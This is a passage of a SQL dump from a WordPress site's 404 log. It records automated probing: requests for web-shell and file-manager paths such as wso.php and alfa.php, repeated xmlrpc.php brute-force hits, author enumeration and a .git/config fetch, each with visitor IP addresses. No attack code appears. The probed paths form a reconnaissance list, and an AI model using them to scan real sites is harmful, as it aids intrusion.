09:30:03'),(8582,'https://amb18b.com/about/function.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:05','2025-11-20 09:30:05'),(8583,'https://amb18b.com/wp-includes/theme-compat/chosen.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:07','2025-11-20 09:30:07'),(8584,'https://amb18b.com/admin/function.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:10','2025-11-20 09:30:10'),(8585,'https://amb18b.com/.well-known/acme-challenge/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:12','2025-11-20 09:30:12'),(8586,'https://amb18b.com/css/colors/blue/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:14','2025-11-20 09:30:14'),(8587,'https://amb18b.com/wp-admin/setup-config.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:17','2025-11-20 09:30:17'),(8588,'https://amb18b.com/wp-admin/js/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:20','2025-11-20 09:30:20'),(8589,'https://amb18b.com/wp-includes/assets/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:24','2025-11-20 09:30:24'),(8590,'https://amb18b.com/wp-includes/fonts/index.php?p=','172.161.90.19','Direct Access',1,'2025-11-20 09:30:27','2025-11-20 09:30:27'),(8591,'https://amb18b.com/.well-known/gecko-litespeed.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:29','2025-11-20 09:30:29'),(8592,'https://amb18b.com/.well-known/admin.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:30','2025-11-20 09:30:30'),(8593,'https://amb18b.com/.well-known/log.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:36','2025-11-20 09:30:36'),(8594,'https://amb18b.com/class.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:38','2025-11-20 09:30:38'),(8595,'https://amb18b.com/bless.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:40','2025-11-20 09:30:40'),(8596,'https://amb18b.com/wp-includes/js/codemirror/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:42','2025-11-20 09:30:42'),(8597,'https://amb18b.com/wp-includes/block-patterns/index.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:43','2025-11-20 09:30:43'),(8598,'https://amb18b.com/lock360.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:45','2025-11-20 09:30:45'),(8599,'https://amb18b.com/bge.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:46','2025-11-20 09:30:46'),(8600,'https://amb18b.com/ifm.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:48','2025-11-20 09:30:48'),(8601,'https://amb18b.com/ww5.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:50','2025-11-20 09:30:50'),(8602,'https://amb18b.com/thxt.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:52','2025-11-20 09:30:52'),(8603,'https://amb18b.com/kairolin.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:53','2025-11-20 09:30:53'),(8604,'https://amb18b.com/siln.php','172.161.90.19','Direct Access',1,'2025-11-20 09:30:55','2025-11-20 09:30:55'),(8605,'https://amb18b.com/wp-admin/css/','84.247.137.198','Invalid Referrer',1,'2025-11-20 09:54:55','2025-11-20 09:54:55'),(8606,'https://amb18b.com/media/system/js/core.js','34.48.231.136','Direct Access',1,'2025-11-20 10:00:09','2025-11-20 10:00:09'),(8607,'https://amb18b.com/new4.php','20.4.74.182','https://www.google.co.uk/',1,'2025-11-20 10:09:14','2025-11-20 10:09:14'),(8608,'https://amb18b.com/bolt.php','238.162.183.87','https://duckduckgo.com/',1,'2025-11-20 10:09:17','2025-11-20 10:09:17'),(8609,'https://amb18b.com/ava.php','79.150.90.35','https://www.bing.com/',1,'2025-11-20 10:09:19','2025-11-20 10:09:19'),(8610,'https://amb18b.com/pow.php','95.143.226.187','https://www.google.co.uk/',1,'2025-11-20 10:09:22','2025-11-20 10:09:22'),(8611,'https://amb18b.com/zuk.php','226.86.206.146','https://duckduckgo.com/',1,'2025-11-20 10:09:24','2025-11-20 10:09:24'),(8612,'https://amb18b.com/fss.php','86.241.53.129','https://www.google.de/',1,'2025-11-20 10:09:27','2025-11-20 10:09:27'),(8613,'https://amb18b.com/test1.php','185.219.1.142','https://www.google.fr/',1,'2025-11-20 10:09:29','2025-11-20 10:09:29'),(8614,'https://amb18b.com/core.php','180.148.131.168','https://www.google.fr/',1,'2025-11-20 10:09:31','2025-11-20 10:09:31'),(8615,'https://amb18b.com/elp.php','39.248.94.168','https://www.google.de/',1,'2025-11-20 10:09:33','2025-11-20 10:09:33'),(8616,'https://amb18b.com/new.php','207.44.1.14','https://www.google.fr/',1,'2025-11-20 10:09:36','2025-11-20 10:09:36'),(8617,'https://amb18b.com/fox.php','200.100.174.100','https://www.google.de/',1,'2025-11-20 10:09:38','2025-11-20 10:09:38'),(8618,'https://amb18b.com/wso.php','54.0.107.228','https://www.google.co.uk/',1,'2025-11-20 10:09:42','2025-11-20 10:09:42'),(8619,'https://amb18b.com/sts.php','51.118.173.88','https://www.google.fr/',1,'2025-11-20 10:09:44','2025-11-20 10:09:44'),(8620,'https://amb18b.com/1.php','210.0.205.162','https://www.google.de/',1,'2025-11-20 10:09:48','2025-11-20 10:09:48'),(8621,'https://amb18b.com/aa.php','97.124.161.137','https://www.google.de/',1,'2025-11-20 10:09:50','2025-11-20 10:09:50'),(8622,'https://amb18b.com/about.php','102.81.127.234','https://www.google.co.uk/',1,'2025-11-20 10:09:52','2025-11-20 10:09:52'),(8623,'https://amb18b.com/admin.php','245.247.111.60','https://www.yahoo.com/',1,'2025-11-20 10:09:54','2025-11-20 10:09:54'),(8624,'https://amb18b.com/admin.php?p=','177.196.211.245','https://www.google.co.uk/',1,'2025-11-20 10:09:56','2025-11-20 10:09:56'),(8625,'https://amb18b.com/akc.php?p=','199.18.182.244','https://www.google.com/',1,'2025-11-20 10:09:59','2025-11-20 10:09:59'),(8626,'https://amb18b.com/app/webroot/filemanager.php?p=','60.99.18.230','https://www.google.de/',1,'2025-11-20 10:10:02','2025-11-20 10:10:02'),(8627,'https://amb18b.com/asasx.php?p=','11.34.177.160','https://www.bing.com/',1,'2025-11-20 10:10:05','2025-11-20 10:10:05'),(8628,'https://amb18b.com/atomlib.php','66.75.19.72','https://www.yahoo.com/',1,'2025-11-20 10:10:07','2025-11-20 10:10:07'),(8629,'https://amb18b.com/autoload_classmap.php','205.188.241.101','https://www.google.co.uk/',1,'2025-11-20 10:10:09','2025-11-20 10:10:09'),(8630,'https://amb18b.com/buy.php','240.203.173.17','https://www.bing.com/',1,'2025-11-20 10:10:11','2025-11-20 10:10:11'),(8631,'https://amb18b.com/media/system/js/core.js','35.226.80.41','Direct Access',1,'2025-11-20 10:26:28','2025-11-20 10:26:28'),(8632,'https://amb18b.com/xmlrpc.php','2400:6180:100:d0::9bc:e001','https://amb18b.com',2,'2025-11-20 10:33:59','2025-11-20 10:33:59'),(8633,'https://amb18b.com/xmlrpc.php','64.227.167.65','https://amb18b.com',2,'2025-11-20 10:38:13','2025-11-20 10:38:13'),(8634,'https://amb18b.com/xmlrpc.php','162.241.127.141','https://amb18b.com',2,'2025-11-20 10:40:28','2025-11-20 10:40:28'),(8635,'https://amb18b.com/xmlrpc.php','103.110.84.40','https://amb18b.com',2,'2025-11-20 10:44:56','2025-11-20 10:44:56');
INSERT INTO `IwGJ28BV_redirects_404` VALUES (8636,'https://amb18b.com/xmlrpc.php','124.156.178.131','https://amb18b.com',2,'2025-11-20 10:47:20','2025-11-20 10:47:13'),(8637,'https://amb18b.com/xmlrpc.php','103.82.22.166','https://amb18b.com',2,'2025-11-20 10:49:31','2025-11-20 10:49:31'),(8638,'https://amb18b.com/xmlrpc.php','103.92.85.202','https://amb18b.com',2,'2025-11-20 10:54:05','2025-11-20 10:54:00'),(8639,'https://amb18b.com/xmlrpc.php','138.68.19.80','https://amb18b.com',2,'2025-11-20 10:56:23','2025-11-20 10:56:23'),(8640,'https://amb18b.com/xmlrpc.php','198.244.233.124','https://amb18b.com',1,'2025-11-20 11:03:17','2025-11-20 11:03:17'),(8641,'https://amb18b.com/xmlrpc.php','198.244.233.124','https://amb18b.com',1,'2025-11-20 11:03:17','2025-11-20 11:03:17'),(8642,'https://amb18b.com/xmlrpc.php','2407:e3c0:0:66:be24:11ff:fe2e:3b02','https://amb18b.com',2,'2025-11-20 11:05:35','2025-11-20 11:05:35'),(8643,'https://amb18b.com/xmlrpc.php','165.22.240.243','https://amb18b.com',2,'2025-11-20 11:10:12','2025-11-20 11:10:12'),(8644,'https://amb18b.com/xmlrpc.php','165.227.140.18','https://amb18b.com',2,'2025-11-20 11:12:26','2025-11-20 11:12:25'),(8645,'https://amb18b.com/xmlrpc.php','165.22.5.123','https://amb18b.com',2,'2025-11-20 11:14:45','2025-11-20 11:14:44'),(8646,'https://amb18b.com/xmlrpc.php','24.77.74.230','Direct Access',1,'2025-11-20 13:28:11','2025-11-20 13:28:11'),(8647,'https://amb18b.com/xmlrpc.php','178.33.109.193','Direct Access',1,'2025-11-20 14:10:29','2025-11-20 14:10:29'),(8648,'https://amb18b.com/xmlrpc.php','91.134.90.219','Direct Access',3,'2025-11-20 14:18:59','2025-11-20 14:18:53'),(8649,'https://amb18b.com/xmlrpc.php','38.180.191.70','Direct Access',1,'2025-11-20 14:32:57','2025-11-20 14:32:57'),(8650,'https://amb18b.com/xmlrpc.php','203.86.122.1','Direct Access',8,'2025-11-20 15:23:12','2025-11-20 15:20:52'),(8651,'https://amb18b.com/xmlrpc.php','171.244.0.91','Direct Access',1,'2025-11-20 15:28:29','2025-11-20 15:28:29'),(8652,'https://amb18b.com/xmlrpc.php','103.178.231.51','Direct Access',1,'2025-11-20 15:38:18','2025-11-20 15:38:18'),(8653,'https://amb18b.com/xmlrpc.php','167.235.76.92','Direct Access',2,'2025-11-20 15:48:49','2025-11-20 15:48:43'),(8654,'https://amb18b.com/xmlrpc.php','74.208.46.181','Direct Access',1,'2025-11-20 16:15:50','2025-11-20 16:15:50'),(8655,'https://amb18b.com/xmlrpc.php','51.178.68.226','Direct Access',8,'2025-11-20 16:57:31','2025-11-20 16:57:12'),(8656,'https://amb18b.com/xmlrpc.php','167.172.219.235','Direct Access',1,'2025-11-20 17:08:09','2025-11-20 17:08:09'),(8657,'https://amb18b.com/xmlrpc.php','64.138.201.250','Direct Access',1,'2025-11-20 17:17:54','2025-11-20 17:17:54'),(8658,'https://amb18b.com/xmlrpc.php','47.236.12.137','https://amb18b.com',2,'2025-11-20 17:31:51','2025-11-20 17:31:51'),(8659,'https://amb18b.com/xmlrpc.php','209.38.229.30','https://amb18b.com',2,'2025-11-20 17:34:18','2025-11-20 17:34:18'),(8660,'https://amb18b.com/xmlrpc.php','64.90.38.74','https://amb18b.com',2,'2025-11-20 17:37:06','2025-11-20 17:37:06'),(8661,'https://amb18b.com/xmlrpc.php','91.142.213.112','Direct Access',3,'2025-11-20 17:40:04','2025-11-20 17:39:05'),(8662,'https://amb18b.com//wp-includes/ID3/license.txt','146.70.194.254','Direct Access',1,'2025-11-20 17:39:36','2025-11-20 17:39:36'),(8663,'https://amb18b.com/?author=2','146.70.194.254','Direct Access',1,'2025-11-20 17:39:39','2025-11-20 17:39:39'),(8664,'https://amb18b.com/xmlrpc.php','146.70.194.254','Direct Access',1,'2025-11-20 17:39:40','2025-11-20 17:39:40'),(8665,'https://amb18b.com/xmlrpc.php','104.248.45.30','https://amb18b.com',2,'2025-11-20 17:39:54','2025-11-20 17:39:53'),(8666,'https://amb18b.com/xmlrpc.php','2a10:b5c1:122::1','https://amb18b.com',2,'2025-11-20 17:42:52','2025-11-20 17:42:52'),(8667,'https://amb18b.com/xmlrpc.php','216.37.42.34','https://amb18b.com',2,'2025-11-20 17:45:14','2025-11-20 17:45:14'),(8668,'https://amb18b.com/xmlrpc.php','103.74.118.39','https://amb18b.com',2,'2025-11-20 17:50:19','2025-11-20 17:50:18'),(8669,'https://amb18b.com/xmlrpc.php','101.78.165.58','https://amb18b.com',2,'2025-11-20 17:52:52','2025-11-20 17:52:52'),(8670,'https://amb18b.com/xmlrpc.php','198.186.130.214','https://amb18b.com',2,'2025-11-20 17:55:10','2025-11-20 17:55:10'),(8671,'https://amb18b.com/xmlrpc.php','213.136.93.171','https://amb18b.com',5,'2025-11-20 19:04:27','2025-11-20 17:57:39'),(8672,'https://amb18b.com/xmlrpc.php','68.183.135.252','https://amb18b.com',4,'2025-11-20 18:22:19','2025-11-20 18:00:05'),(8673,'https://amb18b.com/xmlrpc.php','103.92.85.202','https://amb18b.com',2,'2025-11-20 18:02:39','2025-11-20 18:02:39'),(8674,'https://amb18b.com/xmlrpc.php','209.42.16.52','https://amb18b.com',1,'2025-11-20 18:05:04','2025-11-20 18:05:04'),(8675,'https://amb18b.com/xmlrpc.php','209.42.16.52','https://amb18b.com',1,'2025-11-20 18:05:04','2025-11-20 18:05:04'),(8676,'https://amb18b.com/xmlrpc.php','75.119.208.144','https://amb18b.com',2,'2025-11-20 18:07:35','2025-11-20 18:07:35'),(8677,'https://amb18b.com/xmlrpc.php','104.236.5.222','https://amb18b.com',1,'2025-11-20 18:10:07','2025-11-20 18:10:07'),(8678,'https://amb18b.com/xmlrpc.php','104.236.5.222','https://amb18b.com',1,'2025-11-20 18:10:07','2025-11-20 18:10:07'),(8679,'https://amb18b.com/xmlrpc.php','92.205.167.152','https://amb18b.com',2,'2025-11-20 18:14:56','2025-11-20 18:14:55'),(8680,'https://amb18b.com/xmlrpc.php','103.42.58.99','https://amb18b.com',2,'2025-11-20 18:19:47','2025-11-20 18:19:47'),(8681,'https://amb18b.com/xmlrpc.php','171.246.152.34','https://amb18b.com',2,'2025-11-20 18:24:58','2025-11-20 18:24:58'),(8682,'https://amb18b.com/xmlrpc.php','134.209.73.108','https://amb18b.com',4,'2025-11-20 18:34:44','2025-11-20 18:27:14'),(8683,'https://amb18b.com/xmlrpc.php','192.241.179.13','https://amb18b.com',2,'2025-11-20 18:37:06','2025-11-20 18:37:05'),(8684,'https://amb18b.com/xmlrpc.php','115.190.57.183','https://amb18b.com',1,'2025-11-20 18:39:41','2025-11-20 18:39:41'),(8685,'https://amb18b.com/xmlrpc.php','115.190.57.183','https://amb18b.com',1,'2025-11-20 18:39:41','2025-11-20 18:39:41'),(8686,'https://amb18b.com/xmlrpc.php','2a10:b5c1:120::1','https://amb18b.com',2,'2025-11-20 18:42:11','2025-11-20 18:42:11'),(8687,'https://amb18b.com/xmlrpc.php','2407:e3c0:0:66:be24:11ff:fe2e:3b02','https://amb18b.com',1,'2025-11-20 18:44:38','2025-11-20 18:44:38'),(8688,'https://amb18b.com/xmlrpc.php','2407:e3c0:0:66:be24:11ff:fe2e:3b02','https://amb18b.com',1,'2025-11-20 18:44:38','2025-11-20 18:44:38'),(8689,'https://amb18b.com/xmlrpc.php','192.144.234.15','https://amb18b.com',2,'2025-11-20 18:49:33','2025-11-20 18:49:33'),(8690,'https://amb18b.com/xmlrpc.php','138.68.19.80','https://amb18b.com',2,'2025-11-20 18:52:10','2025-11-20 18:52:10'),(8691,'https://amb18b.com/xmlrpc.php','160.22.122.134','https://amb18b.com',2,'2025-11-20 18:54:33','2025-11-20 18:54:33'),(8692,'https://amb18b.com/xmlrpc.php','2405:4802:1c67:d160:320e:d5ff:fe19:7b89','https://amb18b.com',1,'2025-11-20 19:01:56','2025-11-20 19:01:56'),(8693,'https://amb18b.com/xmlrpc.php','2405:4802:1c67:d160:320e:d5ff:fe19:7b89','https://amb18b.com',1,'2025-11-20 19:01:56','2025-11-20 19:01:56'),(8694,'https://amb18b.com/xmlrpc.php','64.227.146.23','https://amb18b.com',2,'2025-11-20 19:07:04','2025-11-20 19:07:03'),(8695,'https://amb18b.com/xmlrpc.php','209.38.230.167','https://amb18b.com',2,'2025-11-20 19:09:21','2025-11-20 19:09:21'),(8696,'https://amb18b.com/xmlrpc.php','209.38.229.30','https://amb18b.com',1,'2025-11-20 19:11:51','2025-11-20 19:11:51'),(8697,'https://amb18b.com/xmlrpc.php','209.38.229.30','https://amb18b.com',1,'2025-11-20 19:11:51','2025-11-20 19:11:51'),(8698,'https://amb18b.com/xmlrpc.php','217.131.14.13','https://amb18b.com',4,'2025-11-20 19:34:02','2025-11-20 19:14:21'),(8699,'https://amb18b.com/xmlrpc.php','165.227.13.11','https://amb18b.com',2,'2025-11-20 19:16:51','2025-11-20 19:16:51'),(8700,'https://amb18b.com/xmlrpc.php','157.245.109.248','https://amb18b.com',1,'2025-11-20 19:21:42','2025-11-20 19:21:42'),(8701,'https://amb18b.com/xmlrpc.php','157.245.109.248','https://amb18b.com',1,'2025-11-20 19:21:42','2025-11-20 19:21:42'),(8702,'https://amb18b.com/xmlrpc.php','64.225.2.20','https://amb18b.com',1,'2025-11-20 19:31:36','2025-11-20 19:31:36'),(8703,'https://amb18b.com/xmlrpc.php','64.225.2.20','https://amb18b.com',1,'2025-11-20 19:31:36','2025-11-20 19:31:36'),(8704,'https://amb18b.com/xmlrpc.php','194.38.135.180','https://amb18b.com',2,'2025-11-20 19:36:30','2025-11-20 19:36:30'),(8705,'https://amb18b.com/xmlrpc.php','103.216.221.55','Direct Access',1,'2025-11-20 19:37:00','2025-11-20 19:37:00'),(8706,'https://amb18b.com/xmlrpc.php','159.75.154.150','https://amb18b.com',2,'2025-11-20 19:39:05','2025-11-20 19:39:04'),(8707,'https://amb18b.com/xmlrpc.php','2a10:b5c1:122::1','https://amb18b.com',1,'2025-11-20 19:43:44','2025-11-20 19:43:44'),(8708,'https://amb18b.com/xmlrpc.php','2a10:b5c1:122::1','https://amb18b.com',1,'2025-11-20 19:43:44','2025-11-20 19:43:44'),(8709,'https://amb18b.com/xmlrpc.php','139.59.189.244','https://amb18b.com',2,'2025-11-20 19:46:09','2025-11-20 19:46:09'),(8710,'https://amb18b.com/xmlrpc.php','187.45.187.88','Direct Access',9,'2025-11-20 20:45:32','2025-11-20 19:47:52'),(8711,'https://amb18b.com/xmlrpc.php','162.241.126.57','https://amb18b.com',1,'2025-11-20 19:48:34','2025-11-20 19:48:34'),(8712,'https://amb18b.com/xmlrpc.php','162.241.126.57','https://amb18b.com',1,'2025-11-20 19:48:34','2025-11-20 19:48:34'),(8713,'https://amb18b.com/xmlrpc.php','103.192.173.163','https://amb18b.com',1,'2025-11-20 19:51:41','2025-11-20 19:51:41'),(8714,'https://amb18b.com/xmlrpc.php','103.192.173.163','https://amb18b.com',1,'2025-11-20 19:51:41','2025-11-20 19:51:41'),(8715,'https://amb18b.com/xmlrpc.php','182.253.58.188','https://amb18b.com',1,'2025-11-20 19:54:03','2025-11-20 19:54:03'),(8716,'https://amb18b.com/xmlrpc.php','182.253.58.188','https://amb18b.com',1,'2025-11-20 19:54:03','2025-11-20 19:54:03'),(8717,'https://amb18b.com/xmlrpc.php','151.80.151.56','https://amb18b.com',1,'2025-11-20 19:56:27','2025-11-20 19:56:27'),(8718,'https://amb18b.com/xmlrpc.php','151.80.151.56','https://amb18b.com',1,'2025-11-20 19:56:27','2025-11-20 19:56:27'),(8719,'https://amb18b.com/xmlrpc.php','20.151.88.86','https://amb18b.com',2,'2025-11-20 19:58:57','2025-11-20 19:58:56'),(8720,'https://amb18b.com/xmlrpc.php','145.239.93.122','https://amb18b.com',2,'2025-11-20 20:01:15','2025-11-20 20:01:15'),(8721,'https://amb18b.com/xmlrpc.php','34.134.144.77','Direct Access',8,'2025-11-20 20:03:01','2025-11-20 20:02:08'),(8722,'https://amb18b.com/xmlrpc.php','2a10:b5c1:120::1','https://amb18b.com',2,'2025-11-20 20:06:07','2025-11-20 20:06:07'),(8723,'https://amb18b.com/xmlrpc.php','162.250.101.17','https://amb18b.com',1,'2025-11-20 20:08:43','2025-11-20 20:08:43'),(8724,'https://amb18b.com/xmlrpc.php','162.250.101.17','https://amb18b.com',1,'2025-11-20 20:08:43','2025-11-20 20:08:43'),(8725,'https://amb18b.com/xmlrpc.php','77.104.73.130','https://amb18b.com',2,'2025-11-20 20:10:59','2025-11-20 20:10:59'),(8726,'https://amb18b.com/xmlrpc.php','34.179.177.28','Direct Access',1,'2025-11-20 20:12:10','2025-11-20 20:12:10'),(8727,'https://amb18b.com/xmlrpc.php','75.119.208.144','https://amb18b.com',2,'2025-11-20 20:13:26','2025-11-20 20:13:26'),(8728,'https://amb18b.com/xmlrpc.php','167.172.113.201','https://amb18b.com',2,'2025-11-20 20:18:20','2025-11-20 20:18:20'),(8729,'https://amb18b.com/xmlrpc.php','142.44.138.99','https://amb18b.com',1,'2025-11-20 20:20:47','2025-11-20 20:20:47'),(8730,'https://amb18b.com/xmlrpc.php','142.44.138.99','https://amb18b.com',1,'2025-11-20 20:20:47','2025-11-20 20:20:47'),(8731,'https://amb18b.com/xmlrpc.php','35.184.78.239','https://amb18b.com',2,'2025-11-20 20:23:11','2025-11-20 20:23:11'),(8732,'https://amb18b.com/xmlrpc.php','18.229.229.99','https://amb18b.com',2,'2025-11-20 20:25:38','2025-11-20 20:25:38'),(8733,'https://amb18b.com/xmlrpc.php','115.190.57.183','https://amb18b.com',1,'2025-11-20 20:28:06','2025-11-20 20:28:06'),(8734,'https://amb18b.com/xmlrpc.php','115.190.57.183','https://amb18b.com',1,'2025-11-20 20:28:06','2025-11-20 20:28:06'),(8735,'https://amb18b.com/xmlrpc.php','2001:1bb0:e000:1e::e9','https://amb18b.com',2,'2025-11-20 20:30:35','2025-11-20 20:30:35'),(8736,'https://amb18b.com/xmlrpc.php','89.235.79.29','https://amb18b.com',1,'2025-11-20 20:40:19','2025-11-20 20:40:19'),(8737,'https://amb18b.com/xmlrpc.php','89.235.79.29','https://amb18b.com',1,'2025-11-20 20:40:19','2025-11-20 20:40:19'),(8738,'https://amb18b.com/xmlrpc.php','101.78.165.58','https://amb18b.com',2,'2025-11-20 20:45:03','2025-11-20 20:45:03'),(8739,'https://amb18b.com/xmlrpc.php','68.78.37.77','https://amb18b.com',1,'2025-11-20 20:47:32','2025-11-20 20:47:32'),(8740,'https://amb18b.com/xmlrpc.php','68.78.37.77','https://amb18b.com',1,'2025-11-20 20:47:32','2025-11-20 20:47:32'),(8741,'https://amb18b.com/xmlrpc.php','103.82.36.71','https://amb18b.com',1,'2025-11-20 20:49:57','2025-11-20 20:49:57'),(8742,'https://amb18b.com/xmlrpc.php','103.82.36.71','https://amb18b.com',1,'2025-11-20 20:49:57','2025-11-20 20:49:57'),(8743,'https://amb18b.com/xmlrpc.php','150.158.50.113','https://amb18b.com',3,'2025-11-20 20:59:34','2025-11-20 20:52:16'),(8744,'https://amb18b.com/xmlrpc.php','165.227.13.11','https://amb18b.com',2,'2025-11-20 20:54:43','2025-11-20 20:54:42'),(8745,'https://amb18b.com/xmlrpc.php','47.238.97.17','https://amb18b.com',2,'2025-11-20 20:57:07','2025-11-20 20:57:07'),(8746,'https://amb18b.com/xmlrpc.php','64.225.2.20','https://amb18b.com',2,'2025-11-20 21:04:30','2025-11-20 21:04:30'),(8747,'https://amb18b.com/xmlrpc.php','192.144.234.15','https://amb18b.com',2,'2025-11-20 21:06:58','2025-11-20 21:06:58'),(8748,'https://amb18b.com/xmlrpc.php','50.6.174.16','Direct Access',1,'2025-11-20 21:39:48','2025-11-20 21:39:48'),(8749,'https://amb18b.com/xmlrpc.php','129.150.46.7','Direct Access',6,'2025-11-20 22:29:59','2025-11-20 22:28:42'),(8750,'https://amb18b.com/xmlrpc.php','103.110.127.136','Direct Access',2,'2025-11-20 23:05:09','2025-11-20 23:04:59'),(8751,'https://amb18b.com/xmlrpc.php','171.244.0.91','Direct Access',1,'2025-11-20 23:44:40','2025-11-20 23:44:40'),(8752,'https://amb18b.com/xmlrpc.php','162.0.215.243','Direct Access',7,'2025-11-21 00:11:59','2025-11-21 00:11:10'),(8753,'https://amb18b.com/.git/config','93.123.109.7','Direct Access',1,'2025-11-21 00:13:21','2025-11-21 00:13:21'),(8754,'https://amb18b.com/xmlrpc.php','216.172.109.16','Direct Access',3,'2025-11-21 00:22:30','2025-11-21 00:22:01'),(8755,'https://amb18b.com/xmlrpc.php','103.36.103.52','Direct Access',8,'2025-11-21 00:32:46','2025-11-21 00:32:27'),(8756,'https://amb18b.com/new4.php','85.48.98.210','https://www.google.fr/',1,'2025-11-21 00:40:37','2025-11-21 00:40:37'),(8757,'https://amb18b.com/bolt.php','101.106.222.173','https://www.yahoo.com/',1,'2025-11-21 00:40:40','2025-11-21 00:40:40'),(8758,'https://amb18b.com/ava.php','79.21.216.95','https://www.google.fr/',1,'2025-11-21 00:40:42','2025-11-21 00:40:42'),(8759,'https://amb18b.com/pow.php','136.133.231.139','https://www.google.co.uk/',1,'2025-11-21 00:40:45','2025-11-21 00:40:45'),(8760,'https://amb18b.com/zuk.php','149.76.238.231','https://www.google.de/',1,'2025-11-21 00:40:47','2025-11-21 00:40:47'),(8761,'https://amb18b.com/fss.php','51.69.70.23','https://www.google.de/',1,'2025-11-21 00:40:49','2025-11-21 00:40:49'),(8762,'https://amb18b.com/test1.php','225.30.4.235','https://duckduckgo.com/',1,'2025-11-21 00:40:51','2025-11-21 00:40:51'),(8763,'https://amb18b.com/core.php','247.130.231.34','https://duckduckgo.com/',1,'2025-11-21 00:40:53','2025-11-21 00:40:53'),(8764,'https://amb18b.com/elp.php','88.57.177.158','https://www.google.de/',1,'2025-11-21 00:40:55','2025-11-21 00:40:55'),(8765,'https://amb18b.com/new.php','103.156.15.240','https://www.google.fr/',1,'2025-11-21 00:40:57','2025-11-21 00:40:57'),(8766,'https://amb18b.com/fox.php','187.125.147.93','https://www.yahoo.com/',1,'2025-11-21 00:40:59','2025-11-21 00:40:59'),(8767,'https://amb18b.com/wso.php','153.140.217.241','https://www.google.co.uk/',1,'2025-11-21 00:41:03','2025-11-21 00:41:03'),(8768,'https://amb18b.com/sts.php','168.2.239.223','https://www.google.fr/',1,'2025-11-21 00:41:05','2025-11-21 00:41:05'),(8769,'https://amb18b.com/1.php','130.231.166.234','https://www.google.com/',1,'2025-11-21 00:41:08','2025-11-21 00:41:08'),(8770,'https://amb18b.com/aa.php','134.37.58.2','https://www.bing.com/',1,'2025-11-21 00:41:11','2025-11-21 00:41:11'),(8771,'https://amb18b.com/about.php','3.188.150.164','https://www.google.fr/',1,'2025-11-21 00:41:12','2025-11-21 00:41:12'),(8772,'https://amb18b.com/admin.php','160.180.41.226','https://www.google.com/',1,'2025-11-21 00:41:14','2025-11-21 00:41:14'),(8773,'https://amb18b.com/admin.php?p=','139.27.18.233','https://www.google.fr/',1,'2025-11-21 00:41:16','2025-11-21 00:41:16'),(8774,'https://amb18b.com/akc.php?p=','31.59.197.210','https://www.google.de/',1,'2025-11-21 00:41:18','2025-11-21 00:41:18'),(8775,'https://amb18b.com/app/webroot/filemanager.php?p=','180.35.61.53','https://duckduckgo.com/',1,'2025-11-21 00:41:20','2025-11-21 00:41:20'),(8776,'https://amb18b.com/asasx.php?p=','224.116.1.240','https://www.google.com/',1,'2025-11-21 00:41:22','2025-11-21 00:41:22'),(8777,'https://amb18b.com/atomlib.php','147.130.35.97','https://www.yahoo.com/',1,'2025-11-21 00:41:24','2025-11-21 00:41:24'),(8778,'https://amb18b.com/autoload_classmap.php','128.3.121.173','https://www.google.de/',1,'2025-11-21 00:41:26','2025-11-21 00:41:26'),(8779,'https://amb18b.com/buy.php','12.64.150.20','https://duckduckgo.com/',1,'2025-11-21 00:41:28','2025-11-21 00:41:28'),(8780,'https://amb18b.com/chosen.php?p=','1.244.226.208','https://www.bing.com/',1,'2025-11-21 00:41:31','2025-11-21 00:41:31'),(8781,'https://amb18b.com/classwithtostring.php','8.117.82.0','https://www.bing.com/',1,'2025-11-21 00:41:33','2025-11-21 00:41:33'),(8782,'https://amb18b.com/cong.php','67.36.7.145','https://www.bing.com/',1,'2025-11-21 00:41:35','2025-11-21 00:41:35'),(8783,'https://amb18b.com/default.php','238.6.225.118','https://www.google.de/',1,'2025-11-21 00:41:37','2025-11-21 00:41:37'),(8784,'https://amb18b.com/dropdown.php?p=','189.114.244.134','https://duckduckgo.com/',1,'2025-11-21 00:41:39','2025-11-21 00:41:39'),(8785,'https://amb18b.com/filemanager/dialog.php','228.191.93.195','https://www.bing.com/',1,'2025-11-21 00:41:41','2025-11-21 00:41:41'),(8786,'https://amb18b.com/ioxi-o.php','100.152.87.145','https://www.google.co.uk/',1,'2025-11-21 00:41:44','2025-11-21 00:41:44'),(8787,'https://amb18b.com/item.php','24.210.113.195','https://www.google.de/',1,'2025-11-21 00:41:45','2025-11-21 00:41:45'),(8788,'https://amb18b.com/makeasmtp.php?p=','165.44.95.200','https://www.google.com/',1,'2025-11-21 00:41:47','2025-11-21 00:41:47'),(8789,'https://amb18b.com/abcd.php','48.251.16.35','https://www.google.de/',1,'2025-11-21 00:41:51','2025-11-21 00:41:51'),(8790,'https://amb18b.com/ds.php','67.19.34.27','https://www.google.de/',1,'2025-11-21 00:41:53','2025-11-21 00:41:53'),(8791,'https://amb18b.com/alfa.php','31.187.140.4','https://www.google.fr/',1,'2025-11-21 00:41:56','2025-11-21 00:41:56'),(8792,'https://amb18b.com/hplfuns.php','223.134.220.42','https://www.bing.com/',1,'2025-11-21 00:41:58','2025-11-21 00:41:58'),(8793,'https://amb18b.com/file.php','109.219.47.138','https://www.yahoo.com/',1,'2025-11-21 00:42:00','2025-11-21 00:42:00'),(8794,'https://amb18b.com/adminfuns.php','234.121.0.172','https://www.bing.com/',1,'2025-11-21 00:42:02','2025-11-21 00:42:02'),(8795,'https://amb18b.com/wp-admin/css/colors/blue/index.php','92.162.152.210','https://www.google.fr/',1,'2025-11-21 00:42:05','2025-11-21 